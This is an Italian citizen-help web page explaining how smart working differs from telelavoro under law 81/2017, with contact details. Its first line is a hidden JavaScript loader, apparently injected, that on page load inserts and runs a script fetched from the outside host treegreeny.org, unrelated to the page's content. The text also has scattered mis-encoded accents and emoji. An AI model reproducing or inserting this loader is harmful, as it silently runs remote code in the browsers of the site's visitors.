;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Smart working e telelavoro: che differenza c'è? - Sportello Amico Del Cittadino
Smart working e telelavoro: cosa dice la legge?
Smart working e telelavoro: cosa dice la legge?

Smart working e telelavoro: che differenza c’è?

👉 Il lockdown dovuto all’emergenza Covid-19 ha portato alla ribalta il tema del lavoro agile o Smart Working, mostrandone i lati positivi (si può lavorare da ogni dove, niente stress da spostamenti, ecc…) e quelli negativi (obbligo di apparire sempre in video nell’ambiente domestico, maggior contatto con familiari, riduzione del giro di afari per le attivitĂ  di ristorazione).

🔎 La legge n. 81/2017 definisce lo smart working “una modalitĂ  di esecuzione del rapporto di lavoro subordinato caratterizzato dall’assenza di vincoli orari o spaziali e un’organizzazione per fasi, cicli e obiettivi, stabilita mediante accordo tra dipendente e datore di lavoro" “Una modalitĂ  che aiuta il lavoratore a conciliare i tempi di vita e lavoro e, al contempo, favorire la crescita della sua produttività”.

đź“‘ Pertanto: se telelavoro vuol dire “lavorare a distanza", lo “smart working" prevede di lavorare secondo modalitĂ  e tempi in accordo tra lavoratore e azienda.

Lavori da remoto e noti delle prevaricazioni?
Contattaci:
đź–Ą info@sportello-amico.it
📞 +39 0331 262045

Cerca anche

CORSI DI LAUREA

Essere audaci, ambiziosi, combattivi nel lavoro migliorando le proprie prospettive occupazionali è possibile.I Corsi di …

Dona il tuo 5x1000 ad Salesiani per il sociale
Scrivimi
Come posso aiutarti?
Buongiorno! đź‘‹
i nostri uffici sono a vostra disposizione, chatta con noi !